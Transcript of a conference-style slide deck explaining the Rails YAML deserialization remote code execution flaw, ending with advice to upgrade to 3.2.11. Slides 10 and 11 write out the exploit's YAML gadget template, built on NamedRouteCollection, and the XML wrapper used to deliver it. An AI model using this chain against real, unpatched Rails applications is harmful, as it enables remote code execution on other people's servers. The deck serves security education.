Rails YAML vuln.

Transcript

1. YAML in Ruby

2. “This is a VULN” “No, this is a feature.” YAML

   allows us to represent ruby objects directly

3. YAML deserialize blobs : !ruby/object:MyClass MyClass.allocate will execute :

4. Example (really simplistic) (this not real code, but a vulnerable

   object)

5. Normal : Hacked :

6. Normal result: Hacked result:

7. YAML creates objects. With code execution on “[]=” (and more

   methods) Is there a Rails class with that ?
8. None

9. When the fun begin. ActionDispatch::Routing::RouteSet::NamedRouteCollection https://github.com/rails/rails/blob/v3.2.10/actionpack/lib/action_dispatch/ routing/route_set.rb#L113 Allows alias “[]=”

   on “add”

10. Back to Rails. Let’s create a YAML string : ---

    !ruby/ hash:ActionController::Routing::RouteSet::NamedRouteCollection ? #{encoded_payload} : !ruby/struct defaults: :action: create :controller: foos required_parts: [] requirements: :action: create :controller: foos segment_keys: - :format

11. Inject that YAML in XML <?xml version="1.0" encoding="UTF-8"?> <exploit type="yaml">#{yaml.html_escape}</exploit>

12. Send the XML to the app

13. Rails will deserialize the params[], the XML, the YAML, and

    will execute the payload.

14. Rails will deserialize the params[], the XML, the YAML, and

    will execute the payload. ... without 500 errors.
15. None

16. Demo on 3.2.10 simple scaffold app.

17. None

18. Demo on 3.2.11

19. None

20. NOT a Rails problem. It’s a YAML feature. Ok ...

    Rails problem too. UPGRADE to 3.2.11

21. Credit photo/text http://rubysource.com/anatomy-of-an-exploit-an-in-depth-look-at-the-rails-yaml-vulnerability/ http://www.kalzumeus.com/2013/01/31/what-the-rails-security-issue-means-for-your-startup/ http://ronin-ruby.github.com/blog/2013/01/09/rails-pocs.html http://ronin-ruby.github.com/blog/2013/01/28/new-rails-poc.html http://lesjoiesducode.tumblr.com/ Merci. @DAMLN